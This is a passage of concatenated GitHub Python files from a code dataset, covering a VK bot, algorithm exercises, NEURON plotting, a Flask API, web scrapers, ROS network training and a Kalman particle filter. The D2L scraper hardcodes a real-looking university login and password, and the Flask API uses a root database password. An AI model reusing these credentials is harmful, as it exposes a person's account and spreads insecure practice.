summa_of_views = 0\n for url in urls:\n if 'wall' in url:\n info = vk_session1.method('wall.getById', {'posts': url.split('wall')[1]})\n view = info[0]['views']['count']\n doned = check_doned(url.split('wall')[1])\n try:\n copy = check_copypaste(info[0]['copyright']['link'])\n except KeyError:\n copy = False\n try:\n contact = check_contacts(url.split('wall')[1].split('_')[0], user_id)\n except KeyError:\n contact = False\n if url not in counted_urls:\n if state:\n if banned_public(url.split('wall')[1].split('_')[1]):\n if copy:\n if data_check(url):\n if contact:\n if not doned:\n summa_of_views += view\n elif doned == 'requested':\n deffect_postes.append(f'{url} - Оплата уже запрошена')\n elif doned == 'banned':\n deffect_postes.append(f'{url} - Оплата за этот пост была отклонена')\n elif doned == 'payed':\n deffect_postes.append(f'{url} - Пост оплачен')\n else:\n deffect_postes.append(f'{url} - Вас нет в контактах')\n elif data_check(url) == 'long':\n deffect_postes.append(f'{url} - Пост был выставлен более 5-ти дней назад')\n else:\n deffect_postes.append(f'{url} - Некорректная дата')\n else:\n deffect_postes.append(f'{url} - Несовпадение источника')\n else:\n deffect_postes.append(f'{url} - Выплаты из этого паблика заблокированы')\n else:\n summa_of_views += view\n counted_urls.append(url)\n final = f'🤩Общий охват: {summa_of_views} \\n Сумма: {summa_of_views * 15 // 1000}₽'\n return [final, summa_of_views * 15 // 1000, deffect_postes]\n\n\ndef save_photo():\n info = vk_session.method('messages.getHistoryAttachments', {'peer_id': admin_id, 'media_type': 'photo', 'count': 1})\n url = info['items'][0]['attachment']['photo']['sizes'][-1]['url']\n files = os.listdir(path=\"data\")\n count_files_data = len(files)\n picture = requests.get(url)\n while f'img{count_files_data}.jpg' in files:\n count_files_data += 1\n with open(f'data\\img{count_files_data}.jpg', 'wb') as file:\n file.write(picture.content)\n sender(admin_id, 'Успешно, пришлите источник', '666')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Ross-pixel/vk_bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":25428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"37599587251","text":"import os\nimport numpy as np\n\n\ndef compare_numbers(num1, num2) :\n combo1 = num1 + num2\n combo2 = num2 + num1\n \n if combo1 >= combo2 :\n return num1\n else :\n return num2\n\ndef largest_number(numbers) :\n largest_numb = []\n \n while len(numbers) > 0 :\n largest_val = numbers[0]\n for vals in numbers :\n largest_val = compare_numbers(largest_val, vals)\n largest_numb.append(largest_val)\n numbers.remove(largest_val)\n \n return int(\"\".join(largest_numb))\n\n\nif __name__ == \"__main__\" :\n n = int(input())\n numbers = input().split()\n print(largest_number(numbers))","repo_name":"agabhi017/Algortihmic-Toolbox","sub_path":"Week 3/q7_max_salary_v2.py","file_name":"q7_max_salary_v2.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72026053044","text":"from neuron import h\nimport matplotlib\nmatplotlib.use('Agg')\nimport numpy\nfrom pylab import *\nimport mytools\nimport pickle\nimport time\nimport sys\nimport random\n\nv0 = -80\nca0 = 0.0001\nBACdt = 5.0\nfs = 8\ntstop = 13000.0\nicell = 0\n\nh(\"\"\" load_file(\"myrun.hoc\") \"\"\")\n\nclose(\"all\")\nf,axarr = subplots(1,1)\nplotteds = []\nfor itree in range(0,3):\n if itree == 0:\n nsec = len(h.dend)\n elif itree == 1:\n nsec = len(h.apic)\n else:\n nsec = 1\n\n for j in range(nsec-1,-1,-1):\n if itree == 0:\n h(\"access dend[\"+str(j)+\"]\")\n elif itree == 1:\n h(\"access apic[\"+str(j)+\"]\")\n else:\n h(\"access a_soma\")\n h(\"tmpvarx = x3d(0)\")\n h(\"tmpvary = y3d(0)\")\n h(\"tmpvarz = z3d(0)\")\n h(\"tmpvarx2 = x3d(n3d()-1)\")\n h(\"tmpvary2 = y3d(n3d()-1)\")\n h(\"tmpvarz2 = z3d(n3d()-1)\")\n coord1 = [h.tmpvarx,h.tmpvary,h.tmpvarz]\n coord2 = [h.tmpvarx2,h.tmpvary2,h.tmpvarz2]\n col = \"#000000\"\n if itree == 0:\n col = \"#000000\"\n elif 0.5*(coord1[1]+coord2[1]) < 650:\n col = \"#000000\"\n if itree == 2:\n col = \"#000000\"\n\n h(\"\"\"\nmyn = n3d()\nmyx0 = x3d(0)\nmyy0 = y3d(0)\nmyz0 = z3d(0)\n\"\"\")\n oldcoord = [h.myx0, h.myy0, h.myz0]\n for k in range(1,int(h.myn)):\n h(\"\"\"\nmyx0 = x3d(\"\"\"+str(k)+\"\"\")\nmyy0 = y3d(\"\"\"+str(k)+\"\"\")\nmyz0 = z3d(\"\"\"+str(k)+\"\"\")\nmydiam = diam\"\"\")\n\n axarr.plot([oldcoord[0],h.myx0],[oldcoord[1],h.myy0],'k-',linewidth=h.mydiam*0.25,color=col)\n plotteds.append([[oldcoord[0],h.myx0],[oldcoord[1],h.myy0],'k-',h.mydiam*0.25,col])\n oldcoord = [h.myx0, h.myy0, h.myz0]\naxis(\"equal\")\nf.savefig(\"morph_unicolor.eps\")\n\nfile = open('morph.sav', 'wb')\npickle.dump(plotteds,file)\nfile.close()\n\n \n\n","repo_name":"ModelDBRepository/267293","sub_path":"modulhcn_almog/drawmorph_unicolor.py","file_name":"drawmorph_unicolor.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"29047297223","text":"import random\n\n\ndef check_inputs(func):\n def wrapper(*args, **kw):\n self = args[0]\n inputs = args[1]\n input_names = self.input_names\n for name in input_names:\n assert name in inputs.keys()\n return func(*args, **kw)\n\n return wrapper\n\n\ndef generate_samples(input_names, min_val=0, max_val=1, sample_limit=1000):\n samples = []\n for i in range(sample_limit):\n inputs = {}\n for name in input_names:\n inputs[name] = random.randint(min_val, max_val)\n samples.append(inputs)\n return samples\n","repo_name":"ml-inory/ic_design","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"38126251523","text":"import lxml\nfrom bs4 import BeautifulSoup as bs\nfrom create_json import CreateJson\n\n# Класс по парсингу таблиц из сайта\n\nclass Table:\n def __init__(self,source):\n self.soup = bs(source,'lxml')\n self.soup_body = None\n self.list_table = None\n self.inform = False\n self.not_table = None\n self.create_json = CreateJson()\n\n#Проверка наличии таблицы\n\n def check_body_table(self):\n self.list_table = self.soup_body.select(\"table.genTbl\")\n self.not_table = self.soup_body.find('div',{'class':'fullHeaderTwoColumnPage--top'})\n if self.not_table:\n self.inform = True\n else:\n self.inform = False\n \n \n# Поиск елементов в разных блоках\n\n def find_table(self):\n if self.soup.main:\n self.soup_body = self.soup.main\n self.check_body_table()\n elif self.soup.section:\n self.soup_body = self.soup.section\n self.check_body_table()\n \n#Функция поиска если не таблица\n\n def find_not_table(self):\n list_title = self.soup_body.find('h1').text.replace(\"\\t\", \"\")\n information = self.soup_body.find('div',{'class':'fullHeaderTwoColumnPage--top'}).select_one('div.top.bold.inlineblock').select('span')\n table = {list_title: [information[1].text, information[2].text, information[4].text]}\n self.create_json.create(table, self.inform)\n return self.create_json.get_table()\n\n\n#Функция вывода если таблица\n\n def output_info_table(self,list_title):\n table = {}\n if len(list_title) == len(self.list_table):\n for i in range(len(list_title)):\n title = list_title[i].text\n if title not in table.keys():\n table[title] = {}\n list_tag_td = self.list_table[i].find_all('td')\n tbl = [tag_td.text.strip() for tag_td in list_tag_td]\n for j in range(len(tbl)):\n if j % 10 == 1:\n table[title][tbl[j]] = tbl[j + 1:j + 8]\n\n self.create_json.create(table, self.inform)\n return self.create_json.get_table()\n#Вывод информации с сайта\n\n def info_tables(self):\n self.find_table()\n if self.inform:\n return self.find_not_table()\n else:\n if len(self.list_table) > 1:\n list_title = self.soup_body.find_all('h2')\n return self.output_info_table(list_title)\n elif len(self.list_table) == 1:\n list_title = self.soup_body.find_all('h1')\n return self.output_info_table(list_title)\n\n\n\n","repo_name":"Multivarka/scraping_invest","sub_path":"infotable.py","file_name":"infotable.py","file_ext":"py","file_size_in_byte":2789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71113164405","text":"import mysql.connector\r\nfrom mysql.connector import errorcode\r\nimport flask\r\nfrom flask import request, jsonify\r\nimport requests\r\nimport json\r\n\r\n#initiating flask\r\napp = flask.Flask(__name__)\r\napp.config[\"DEBUG\"] = True\r\n\r\n# Database connection\r\ntry:\r\n cnx = mysql.connector.connect(host=\"localhost\", user='root', password='12345')\r\nexcept mysql.connector.Error as err:\r\n if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:\r\n print(\"Wrong password\")\r\n else:\r\n print(err)\r\n \r\ncursor = cnx.cursor()\r\nquery = (\" SELECT LOCATION, DATE, temperature, FORECAST FROM DEDOMENA.KAIROS\")\r\ncursor.execute(query)\r\n\r\nfirst_list = [] #first list contains three forecasts per day\r\nfor (location, date, temperature, forecast) in cursor:\r\n first_list.extend(list((location, date, temperature, forecast)))\r\n \r\nsecond_list = [] #second list contains latest forecast per day\r\nfor i in range(0, len(first_list), 12):\r\n second_list.append(first_list[i])\r\n second_list.append(first_list[i+1])\r\n second_list.append(first_list[i+2])\r\n second_list.append(first_list[i+3])\r\n\r\nthird_list = [] #third list contains average temperature per day\r\nfor i in range(0, len(first_list), 12):\r\n third_list.append(first_list[i])\r\n third_list.append(first_list[i+1])\r\n third_list.append((first_list[i+2] + first_list[i+6] + first_list[i+10])/ 3)\r\n third_list.append(first_list[i+3])\r\n \r\n@app.route('/', methods=['GET'])\r\ndef home():\r\n return jsonify(second_list) \r\n \r\n@app.route('/average_temp', methods=['GET'])\r\ndef forecasts():\r\n return jsonify(third_list) \r\n \r\napp.run()","repo_name":"Ammutseba/metaweather","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"21733340407","text":"from selenium import webdriver\r\nfrom bs4 import BeautifulSoup\r\nimport numpy as np\r\nimport datetime\r\nimport pickle\r\n\r\n# handles the hidden roots on d2l pages\r\ndef expand_shadow_element(element):\r\n shadow_root = driver.execute_script('return arguments[0].shadowRoot', element)\r\n return shadow_root\r\n\r\n# loads pickled files\r\ndef load_obj(datatype):\r\n with open(\"{}\".format(datatype) + '.pkl', 'rb') as f:\r\n return pickle.load(f)\r\n\r\n# container for msuclass objects, also initializes new msuclass objs with values along with other methods\r\nclass msuclasses:\r\n def __init__(self):\r\n # init various needed variables\r\n self.classes = []\r\n self.assn_id_holder = \"873465\"\r\n self.get_assignments()#self.d2l_driver())\r\n \r\n # add a new msuclass object\r\n def add_new(self,id):\r\n # if not multiple ids then make list\r\n if type(id) != list:id = [id]\r\n # starts d2l selenium driver\r\n driver = self.d2l_driver()\r\n # add individual class data to self.classes\r\n [self.classes.append(msuclass(i,driver)) for i in id]\r\n\r\n # gets individual class pending assignments [webscraper]\r\n def get_assignments(self):#,driver):\r\n # scrapes the d2l assn webpage and initialize needed variables\r\n # driver.get(\"https://d2l.msu.edu/d2l/le/calendar/{}/home/list?year=2010&month=6&day=27\".format(self.assn_id_holder))\r\n # assnsoup = BeautifulSoup(driver.page_source,\"html.parser\")\r\n assnsoup = BeautifulSoup(load_obj(\"tempassn\"),\"html.parser\")\r\n assignments = assnsoup.findAll(\"form\")[1].findAll(\"li\")\r\n assns,final_prods,x_axis,y_axis = {},{},[],[]# raw data,final polished data,classnames,dates\r\n # format the form tags scraped and add to dictionary with date as keys\r\n for assn in assignments:\r\n temp = list(filter(None, assn.text.split(\"\\n\")))\r\n try:\r\n assns[datetime.datetime.strptime(temp[3],\"%b %d, %Y %I:%M %p\")].append((temp[1],temp[2]))\r\n except:\r\n assns[datetime.datetime.strptime(temp[3],\"%b %d, %Y %I:%M %p\")] = [(temp[1],temp[2])]\r\n\r\n # iterates through all dates\r\n for day in list(assns.keys()):\r\n # add dates and init temporary variables\r\n y_axis.append(day)\r\n dayassns,final_prods[day] = {},{}\r\n # organize data\r\n for assi in assns[day]:\r\n if assi[0] not in x_axis:\r\n x_axis.append(assi[0])\r\n try:\r\n final_prods[day][assi[0]].append(assi[1])\r\n except:\r\n final_prods[day][assi[0]] = [(assi[1])]\r\n\r\n # initialize array for placing data into\r\n assn_array = np.zeros((len(y_axis),len(x_axis)),dtype=object)\r\n # more organizing and formatting of data\r\n for y_val in list(final_prods.keys()):\r\n for x_val in list(final_prods[y_val].keys()):\r\n for assin in final_prods[y_val][x_val]:\r\n if assn_array[y_axis.index(y_val)][x_axis.index(x_val)] == 0.0:\r\n assn_array[y_axis.index(y_val)][x_axis.index(x_val)] = assin\r\n else:\r\n assin = \"; \" + assin\r\n assn_array[y_axis.index(y_val)][x_axis.index(x_val)] += assin\r\n # remove null vals and package all data together into a dictionary\r\n values = [[v if v!= 0 else \"\" for v in vals] for vals in assn_array]\r\n self.assignments = {\"x_axis\":x_axis,\"y_axis\":y_axis,\"assignments\":values}\r\n\r\n # calls update_grades() on all of the classes saved\r\n def update_all_grades(self):\r\n # driver = self.d2l_driver()\r\n self.classes = [class_.update_grades() for class_ in self.classes]#driver\r\n\r\n \r\n def d2l_driver(self):\r\n chromedriver = ('C:\\\\Users\\\\Kaobe\\\\PycharmProjects\\\\School\\\\venv\\\\Include\\\\chromedriver.exe')\r\n driver = webdriver.Chrome(chromedriver)\r\n driver.get(\"https://d2l.msu.edu/d2l/loginh/\")\r\n driver.find_element_by_id(\"login-button\").click()\r\n driver.find_element_by_id(\"msu-id\").send_keys(\"osolukao\")\r\n driver.find_element_by_id(\"password\").send_keys(\"Kao4be123\")\r\n driver.find_element_by_class_name(\"msuit_brand_submit\").click()\r\n return driver\r\n\r\n def calc_assn_urgency(self):\r\n self.heat_data = schedanalysis(self).calculate_assn_urgency()\r\n\r\n\r\n\r\n","repo_name":"kaobeosolu78/Food_Stock_and_Class_Schedule","sub_path":"SchedContainer.py","file_name":"SchedContainer.py","file_ext":"py","file_size_in_byte":4436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"14791930048","text":"from typing import Any, Union\n\n\ndef traverse(tree: Union[dict, list], path: str, separator: str = \"/\") -> Any:\n \"\"\"The traverse function takes a tree and a path, and returns the value at\n that path. The tree can be either a list or dictionary, but the path must\n be valid for that type of tree.\n\n Example:\n .. code-block:: python\n\n >>> root = {\n >>> \"weekdays\": {\n >>> \"monday\": \"hello\",\n >>> \"tuesday\": \"hola\",\n >>> \"wednesday\": \"hallo\",\n >>> \"thursday\": \"bonjour\",\n >>> \"friday\": \"Здраво\",\n >>> },\n >>> \"fibonacci\": [\n >>> 1, 1, 2, 3, 5, 8, 13\n >>> ]\n >>> }\n\n >>> traverse(root, \"weekday/monday)\n \"hello\"\n\n >>> traverse(root, \"fibonacci/4\")\n 5\n\n Args:\n tree (:class:`~typing.Union`\\\\[:obj:`dict`, :obj:`list`]): The tree to\n traverse.\n path (:obj:`str`): Specify the path to the node that we want to access.\n separator (:obj:`str`, *optional*): Specify the path separator.\n Defaults to \"/\".\n\n Raises:\n ValueError: If index is not an integer.\n KeyError: If trying to access a non-existing nodes.\n\n Returns:\n :obj:`~typing.Any`: The node at that path.\n \"\"\"\n if tree is None:\n return None\n\n nodes: list[str] = path.split(separator)\n\n for node in nodes:\n if node == \"\":\n continue\n\n if isinstance(tree, list):\n try:\n tree = tree[int(node)]\n except ValueError as err:\n raise ValueError(\"Index must be an integer.\") from err\n continue\n\n if isinstance(tree, dict) and node in tree:\n tree = tree[node]\n continue\n\n raise KeyError(f\"Trying to access nonexistent nodes: {node}\")\n\n return tree\n\n\ndef bfs_attr_search(root: Any, attr: str) -> Any:\n \"\"\"\n Searches for attribute in object using the BFS algorithm.\n\n .. Note::\n attributes starting with '_' are ignored.\n\n Example:\n .. code-block:: python\n\n >>> def fun():\n ... pass\n >>> fun.hello = lambda x: x * 2\n >>> fun.hello.again = lambda x: x / 4\n >>> fun.hallo = lambda x: x - 7\n >>> fun.hallo.wieder = lambda x: x ** 3\n >>> fun.hola = lambda x: x + 2\n >>> fun.hola.otravez = lambda x: x * 8\n >>> bfs_attr_search(fun, \"again\")\n at ???>\n >>> bfs_attr_search(fun, \"again\")(20)\n 5.0\n\n Args:\n root (:obj:`~typing.Any`): Root of search.\n attr (:obj:`str`): Attribute name to search.\n\n Raises:\n AttributeError: When could not find the attribute.\n\n Returns:\n :obj:`~typing.Any`: The attribute with name attr found in search.\n \"\"\"\n\n queue: list = []\n visited: list = []\n\n queue.append(root)\n visited.append(id(root))\n\n while queue:\n obj = queue.pop()\n\n if hasattr(obj, attr):\n return getattr(obj, attr)\n\n try:\n objs = map(\n lambda attr: getattr(obj, attr),\n filter(lambda s: not s.startswith(\"_\"), vars(obj)),\n )\n except TypeError:\n continue\n\n for neighbor in objs:\n if id(neighbor) not in visited:\n queue.append(neighbor)\n visited.append(id(neighbor))\n\n raise AttributeError(f\"Could not find attribute {attr}\")\n","repo_name":"victorcebarros/korone","sub_path":"src/korone/utils/traverse.py","file_name":"traverse.py","file_ext":"py","file_size_in_byte":3619,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"76"} +{"seq_id":"41176477488","text":"#!/usr/bin/env python\r\nimport rospy\r\nfrom std_msgs.msg import String\r\nfrom geometry_msgs.msg import PoseStamped\r\nfrom geometry_msgs.msg import Point\r\nfrom sensor_msgs.msg import LaserScan\r\nfrom nav_msgs.msg import Odometry,OccupancyGrid\r\nfrom visualization_msgs.msg import Marker\r\nfrom visualization_msgs.msg import MarkerArray\r\nimport tf.transformations\r\nimport tf\r\n#import laser cast part\r\nfrom Laser import Laser, Map\r\nimport math\r\n\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Dropout, Activation\r\n\r\nfrom keras.optimizers import SGD\r\nfrom copy import copy\r\nimport numpy as np\r\nimport os\r\nfrom keras.models import model_from_json\r\nfrom keras.callbacks import ModelCheckpoint\r\nfrom keras.optimizers import Adam\r\noptim=Adam(lr=0.00001, beta_1=0.9, beta_2=0.999, epsilon=1e-08)\r\n\r\n#Network parameters\r\ndata_dim =362 \r\noutput_size=3 \r\nbatch_size=128\r\nepoch=1\r\n\r\ndef normalize_angle(theta):\r\n#Normalize phi to be between -pi and pi\r\n while theta> math.pi:\r\n\t theta = theta - 2*math.pi\r\n\r\n while theta<-math.pi:\r\n\t theta = theta + 2*math.pi\r\n\r\n return theta\r\n\r\ndef calculateScans(train_pose,delta_odom,laser):\r\n global data_laser_simul\r\n data_laser_simul=[]\r\n train_pose.pop()\r\n for i in range(len(train_pose)):\r\n update=train_pose[i]+delta_odom[i]\r\n predicted_laser=getLaserCast( update[0],update[1],update[2],laser)\r\n data_laser_simul.append(predicted_laser)\r\n\r\ndef mapWrapper(occ_map, width,height):\r\n #print(\"occ_map\",occ_map)\r\n occ_map=np.array(occ_map)\r\n for i in range(occ_map.shape[0]):\r\n if occ_map[i] >= 0:\r\n occ_map[i] = 1.0-(occ_map[i]/100.0)\r\n else:\r\n occ_map[i] = 1\r\n occ_map.resize(height, width)\r\n occ_map = occ_map.T\r\n return occ_map\r\n\r\ndef initCaster(wrappedMap,mapInfo):\r\n offset_x =mapInfo.origin.position.x\r\n offset_y =mapInfo.origin.position.y\r\n resolution = mapInfo.resolution\r\n\r\n #Parameters of the laser\r\n max_range = 50.0\r\n no_of_beams = 181\r\n min_angle = -math.pi/2.0\r\n resolution_angle = math.pi/(no_of_beams-1)\r\n noise_variance = 0.0#perfect\r\n\r\n map_obj = Map(mapInfo.height, mapInfo.width, offset_x, offset_y, resolution, wrappedMap)\r\n laser = Laser(max_range, min_angle, resolution_angle, no_of_beams, noise_variance, map_obj)\r\n return laser\r\n\r\ndef getLaserCast(robot_pos_x,robot_pos_y,robot_theta, laser):\r\n #relative position of the laser scanner to the center of the robot\r\n laser_pos_x = 1.2\r\n laser_pos_y = 0.0\r\n laser_angle = 0.0 * (math.pi/180.0)\r\n\r\n sin_theta = math.sin(robot_theta)\r\n cos_theta = math.cos(robot_theta)\r\n x = robot_pos_x + laser_pos_x * cos_theta - laser_pos_y*sin_theta\r\n y = robot_pos_y + laser_pos_x * sin_theta + laser_pos_y*cos_theta\r\n theta = robot_theta + laser_angle\r\n theta=normalize_angle(theta)\r\n\r\n ranges = laser.scan(x,y,theta)\r\n return ranges\r\n\r\n\r\n\r\n\r\ngridMap=OccupancyGrid()\r\ncallback_front_laser=[]\r\ncallback_pose_new=PoseStamped()\r\nodom=Odometry()\r\n#training data\r\ndata_pose=[]\r\ndata_laser=[]\r\ndata_laser_simul=[]\r\ndata_odom=[]\r\n\r\ndef get_data():\r\n global callback_front_laser\r\n global callback_pose_new\r\n global data_pose\r\n global data_laser\r\n global odom\r\n global data_odom\r\n\r\n # get pose\r\n temp=[None]*3\r\n temp[0]=copy(callback_pose_new.pose.position.x)\r\n temp[1]=copy(callback_pose_new.pose.position.y)\r\n quaternion = (\r\n callback_pose_new.pose.orientation.x,\r\n callback_pose_new.pose.orientation.y,\r\n callback_pose_new.pose.orientation.z,\r\n callback_pose_new.pose.orientation.w)\r\n\r\n euler = tf.transformations.euler_from_quaternion(quaternion)\r\n temp[2]=copy(euler[2])\r\n data_pose.append(copy(temp))\r\n #get laser front\r\n data_laser.append(copy(callback_front_laser))\r\n\r\n #odom update\r\n odom_current=[None]*3\r\n quaternion = (\r\n odom.pose.pose.orientation.x,\r\n odom.pose.pose.orientation.y,\r\n odom.pose.pose.orientation.z,\r\n odom.pose.pose.orientation.w)\r\n\r\n euler = tf.transformations.euler_from_quaternion(quaternion)\r\n odom_current[0] =copy(odom.pose.pose.position.x)\r\n odom_current[1]=copy(odom.pose.pose.position.y)\r\n odom_current[2]=euler[2]\r\n data_odom.append(odom_current)\r\n\r\ndef callback_map(data):\r\n global gridMap\r\n gridMap=data\r\n \r\n\r\ndef callback_front(data):\r\n global callback_front_laser\r\n callback_front_laser=data.ranges\r\n\r\n\r\n\r\ndef callback_pose(data):\r\n global callback_pose_new\r\n callback_pose_new=data\r\n \r\n \r\ndef callback_odom(data):\r\n global odom\r\n odom=data\r\n\r\n\r\ndef both():\r\n global data_laser\r\n global data_laser_simul\r\n global data_pose\r\n global odom\r\n global gridMap\r\n \r\n rospy.init_node('correction_net_train', anonymous=True)\r\n #subscribe\r\n rospy.Subscriber('scan_front', LaserScan, callback_front)\r\n rospy.Subscriber('true_pose', PoseStamped, callback_pose)\r\n rospy.Subscriber('odom', Odometry, callback_odom)\r\n rospy.Subscriber('/map', OccupancyGrid, callback_map)\r\n rate = rospy.Rate(10) # 10hz\r\n rospy.sleep(2.)\r\n \r\n \r\n time_last_update = rospy.Time.now()\r\n update_weights_freq= rospy.Duration(10).to_sec()\r\n\r\n wrappedMap= mapWrapper(gridMap.data,gridMap.info.width, gridMap.info.height)\r\n laser=initCaster(wrappedMap, gridMap.info)\r\n while not rospy.is_shutdown():\r\n rate.sleep()\r\n diff_time=rospy.Time.now()-time_last_update# frequency of update\r\n get_data()\r\n if(diff_time.to_sec()>=update_weights_freq):\r\n time_last_update=rospy.Time.now()\r\n train_front=copy(data_laser)\r\n train_pose=copy(data_pose)\r\n train_odom=copy(data_odom)\r\n #generate laser scans from odom position\r\n\r\n \r\n delta_odom=np.diff(train_odom,axis=0)\r\n delta_pose=np.diff(train_pose,axis=0)\r\n print(\"delta_odom\",delta_odom.shape)\r\n print(\"delta_pose\",delta_pose.shape)\r\n train_front.pop(0)\r\n\r\n calculateScans(train_pose,delta_odom,laser)\r\n delta=delta_pose-delta_odom\r\n\r\n print(\"train_front\", len(train_front))\r\n print(\"train_simul\", len(data_laser_simul))\r\n\r\n data=np.hstack((data_laser_simul,train_front))\r\n X_train=np.reshape(data, (data.shape[0],1,1, data_dim))\r\n print('X_train',X_train.shape)\r\n y_train=np.array( delta)\r\n print('y_train',y_train.shape)\r\n netname=\"CorrectionNet\"\r\n if not os.path.isfile(netname+'.h5') or not os.path.isfile(netname+'.json'):\r\n print('NO NETWORK')\r\n else:\r\n print('Loading existing network')\r\n model = model_from_json(open(netname+'.json').read())\r\n model.load_weights(netname+'.h5')\r\n\r\n #compile loaded model\r\n model.compile(loss='mse',optimizer=optim)\r\n print('Start learning...')\r\n model.fit(X_train, y_train, nb_epoch=epoch,batch_size=batch_size)\r\n model.save_weights(netname+'.h5', overwrite=True)\r\n # spin() simply keeps python from exiting until this node is stopped\r\n rospy.spin()\r\n\r\nif __name__ == '__main__':\r\n print('Start retraining')\r\n both()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Dtananaev/localization","sub_path":"correction_net/scripts/correction_net_train.py","file_name":"correction_net_train.py","file_ext":"py","file_size_in_byte":7301,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"76"} +{"seq_id":"17482718149","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 17 19:13:33 2018\n\n@author: alexandre\n\"\"\"\n\nfrom roblib import *\nfrom PyUnityVibes.UnityFigure import UnityFigure\n\ndef kalman_predict(xup,Gup,u,Γα,A):\n Γ1 = A @ Gup @ A.T + Γα\n x1 = A @ xup + u \n return(x1,Γ1) \n\ndef kalman_correc(x0,Γ0,y,Γβ,C):\n S = C @ Γ0 @ C.T + Γβ \n if det(S) != 0 :\n K = Γ0 @ C.T @ inv(S)\n else : \n K = zeros((3,2))\n ytilde = y - C @ x0 \n Gup = (eye(len(x0))-K @ C) @ Γ0 \n xup = x0+ K@ytilde \n return(xup,Gup) \n \ndef kalman(x0,Γ0,u,y,Γα,Γβ,A,C):\n xup,Gup = kalman_correc(x0,Γ0,y,Γβ,C)\n x1,Γ1=kalman_predict(xup,Gup,u,Γα,A)\n return(x1,Γ1)\n\n############################################\nclass Particule:\n \"\"\"\n Particule class\n \"\"\"\n def __init__(self,X,U,cov, figure):\n \"\"\"\n Constructor\n\n Parameters\n ----------\n X: state vector\n X[0]:x coordinate\n X[1]:y coordinate\n X[2]:v speed\n\n U: input vector\n U[0]:u speed input\n U[1]:theta heading input\n\n cov: matrix 3*3\n covariance matrix\n \"\"\"\n\n self.Xchap = X\n self.X = X\n self.U = U\n self.cov = cov\n self.theta = 0\n self.auv = figure.create(UnityFigure.OBJECT_3D_SUBMARINE, 0, 0, 0, dimX=5, dimY=5, dimZ=5)\n\n\n\n def __str__(self):\n \"\"\"\n Allows to print the Particule object\n \"\"\"\n X = self.X.flatten()\n U = self.U.flatten()\n return 'X: \\n x coordinate > {}\\n y coordinate > {}\\n speed > {}\\n\\n U: \\n speed input > {}\\n theta heading input > {}\\n\\n cov:\\n {}'.format(self.X[0], self.X[1], self.X[2], self.U[0], self.U[1], self.cov)\n\n\n def __repr__(self):\n X = self.X.flatten()\n U = self.U.flatten()\n return \"Vecteur etat : [{},{},{}]\".format(self.X[0],self.X[1],self.X[2]) + \"\\n Matrice de covariance : {}\".format(self.cov) + \"\\n Vecteur d'entree : [{},{}]\".format(self.U[0],self.U[1]) # {:.2f} notation pour n'afficher que deux chiffres après la virgule\n\n\n def display(self,col):\n \"\"\"\n Allows to display the Particule object through matplotlib\n \"\"\"\n X = self.X.flatten()\n U = self.U.flatten()\n draw_arrow(X[0],X[1],U[1],0.1,col)\n\n def appendFrame(self,anim): #PyUnityVibes\n anim.appendFrame(self.auv, x=self.X[0,0], y=0.0, z=self.X[1,0], rx=0, ry=0, rz=self.U[1,0])\n\n def controle(self,t,w):\n \"\"\"\n Control equation of the AUV\n \"\"\"\n k = 1\n xchap = self.Xchap\n x = self.X\n U = self.U\n U[1,0] = k*(w-self.theta)\n return U\n\n def f(self):\n \"\"\"\n State equation of the AUV\n\n alpha : bruit gaussien sur x,y et v\n \"\"\"\n \n theta = self.U[1,0]\n u = self.U[0,0]\n\n sigma_x, sigma_y,sigma_v = 0.1,0.1,0.15\n G_alpha = np.diag([sigma_x**2,sigma_y**2,sigma_v**2])\n\n alpha = np.zeros((3,1))\n alpha[0,0] = np.random.randn(1,1)*sigma_x\n alpha[1,0] = np.random.randn(1,1)*sigma_y\n alpha[2,0] = np.random.randn(1,1)*sigma_v\n\n\n A = array([[0,0,cos(theta)],[0,0,sin(theta)],[0,0,-1]])\n return A.dot(self.X) + array([[0],[0],[u]]) + alpha\n\n\n def step(self,t,dt):\n if t > 60:\n C = array([[1,0,0],[0,1,0]])\n G_beta = diag([[0.45**2],[0.45**2]])\n else :\n C = zeros((2,3))\n G_beta = zeros((2,2))\n\n sigma_x, sigma_y,sigma_v = 0.1,0.1,0.15\n G_alpha = np.diag([sigma_x**2,sigma_y**2,sigma_v**2])\n\n\n self.X = self.X + dt*self.f()\n \n \n U = self.U.flatten()\n \n A = array([[1,0,cos(self.theta)],[0,1,sin(self.theta)],[0,0,-1]])\n self.Xchap,self.cov = kalman(self.X,self.cov,array([[0],[0],[U[0]]]),G_beta ,G_alpha,G_beta,A,C)\n self.U = self.controle(t,pi/2)\n\n\n\n\n\nif __name__ == \"__main__\":\n\n X = array([[1],[10],[2]])\n Xchap = X\n U = array([[3],[pi/4]])\n cov = eye(3)\n theta = 0\n part = Particule(X,Xchap,U,cov,theta)\n print(part)\n figure()\n part2 = part\n part2.step(10,0.1)\n print(part2)\n part2.display(\"red\")\n part2.step(12,0.1)\n part2.display(\"green\")","repo_name":"clavieev/Predictor","sub_path":"Filtre_particulaire/Python/include/particule.py","file_name":"particule.py","file_ext":"py","file_size_in_byte":4268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"76"} 